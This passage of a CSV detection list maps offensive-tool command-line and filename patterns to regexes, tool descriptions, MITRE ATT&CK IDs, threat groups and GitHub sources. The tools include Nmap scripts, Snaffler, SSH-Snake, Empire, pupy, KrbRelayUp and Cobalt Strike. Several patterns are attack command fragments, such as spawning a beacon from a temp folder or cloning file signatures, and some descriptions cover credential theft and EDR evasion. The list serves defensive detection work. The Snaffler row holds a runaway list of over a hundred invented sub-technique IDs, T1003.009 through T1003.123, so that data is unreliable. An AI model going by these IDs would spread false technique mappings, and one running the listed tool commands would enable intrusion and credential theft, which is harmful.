"* smtp-vuln-cve2020-28017-through-28026-21nails.nse*",".{0,1000}\ssmtp\-vuln\-cve2020\-28017\-through\-28026\-21nails\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","0","N/A","N/A","N/A","7","627","59","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z","3267"
"* --smuggle --template mcafee --com *",".{0,1000}\s\-\-smuggle\s\-\-template\smcafee\s\-\-com\s.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","3268"
"* smuggler.py*",".{0,1000}\ssmuggler\.py.{0,1000}","offensive_tool_keyword","smuggler.py","HTML Smuggling Generator","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing","https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py","1","0","N/A","N/A","9","3","299","55","2024-08-08T06:11:06Z","2023-01-15T22:37:34Z","3269"
"* snaffler.log*",".{0,1000}\ssnaffler\.log.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","0","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","3270"
"* snaffler.py *",".{0,1000}\ssnaffler\.py\s.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","3271"
"* Snake.sh *",".{0,1000}\/Snake\.sh.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#linux","N/A","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","3272"
"* Snake.sh*",".{0,1000}\sSnake\.sh.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","N/A","N/A","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","3273"
"* sniffer.py*",".{0,1000}\ssniffer\.py.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","3274"
"* sniffer-detect.nse*",".{0,1000}\ssniffer\-detect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3275"
"* SnifferSpoofer*",".{0,1000}\sSnifferSpoofer.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","3276"
"* snmp-brute.nse*",".{0,1000}\ssnmp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3277"
"* snmp-hh3c-logins.nse*",".{0,1000}\ssnmp\-hh3c\-logins\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3278"
"* snmp-info.nse*",".{0,1000}\ssnmp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3279"
"* snmp-interfaces.nse*",".{0,1000}\ssnmp\-interfaces\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3280"
"* snmp-ios-config.nse*",".{0,1000}\ssnmp\-ios\-config\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3281"
"* snmp-netstat.nse*",".{0,1000}\ssnmp\-netstat\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3282"
"* snmp-processes.nse*",".{0,1000}\ssnmp\-processes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3283"
"* snmp-sysdescr.nse*",".{0,1000}\ssnmp\-sysdescr\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3284"
"* snmp-win32-services.nse*",".{0,1000}\ssnmp\-win32\-services\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3285"
"* snmp-win32-shares.nse*",".{0,1000}\ssnmp\-win32\-shares\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3286"
"* snmp-win32-software.nse*",".{0,1000}\ssnmp\-win32\-software\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3287"
"* snmp-win32-users.nse*",".{0,1000}\ssnmp\-win32\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3288"
"* snsenum.py*",".{0,1000}\ssnsenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","3289"
"* SOAPHound.ADWS*",".{0,1000}\sSOAPHound\.ADWS.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","#content","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","3290"
"* SocialBox.sh*",".{0,1000}\sSocialBox\.sh.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","0","N/A","N/A","7","10","3581","391","2024-09-02T19:15:22Z","2019-03-28T18:07:05Z","3291"
"* socks5proxy.py*",".{0,1000}\ssocks5proxy\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","3293"
"* socks-auth-info.nse*",".{0,1000}\ssocks\-auth\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3294"
"* socks-brute.nse*",".{0,1000}\ssocks\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3295"
"* socks-open-proxy.nse*",".{0,1000}\ssocks\-open\-proxy\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3296"
"* -Source c:\windows\*.exe -Target *.exe -Sign*",".{0,1000}\s\-Source\sc\:\\windows\\.{0,1000}\.exe\s\-Target\s.{0,1000}\.exe\s\-Sign.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/threatexpress/metatwin","1","0","N/A","N/A","9","4","345","71","2024-11-19T19:45:59Z","2017-10-08T13:26:00Z","3298"
"* -Source c:\windows\system32\*.dll -Target *.exe -Sign*",".{0,1000}\s\-Source\sc\:\\windows\\system32\\.{0,1000}\.dll\s\-Target\s.{0,1000}\.exe\s\-Sign.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/threatexpress/metatwin","1","0","N/A","N/A","9","4","345","71","2024-11-19T19:45:59Z","2017-10-08T13:26:00Z","3299"
"* spawn C:\Windows\Temp\beacon.exe*",".{0,1000}\sspawn\sC\:\\Windows\\Temp\\beacon\.exe.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","3300"
"* spawn C:\Windows\Temp\loader.exe*",".{0,1000}\sspawn\sC\:\\Windows\\Temp\\loader\.exe.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","3301"
"* spawn -m adcs -d * -dc *",".{0,1000}\sspawn\s\-m\sadcs\s\-d\s.{0,1000}\s\-dc\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","3302"
"* spawn -m shadowcred -d *",".{0,1000}\sspawn\s\-m\sshadowcred\s\-d\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","3303"
"* spawn.x64.c*",".{0,1000}\sspawn\.x64\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/spawn","1","0","N/A","N/A","10","10","455","73","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z","3304"
"* spawn.x64.o*",".{0,1000}\sspawn\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/spawn","1","0","N/A","N/A","10","10","455","73","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z","3305"
"* spawnto_x64 *",".{0,1000}\sspawnto_x64\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","N/A","10","10","1676","299","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z","3306"
"* spawnto_x86 *",".{0,1000}\sspawnto_x86\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat 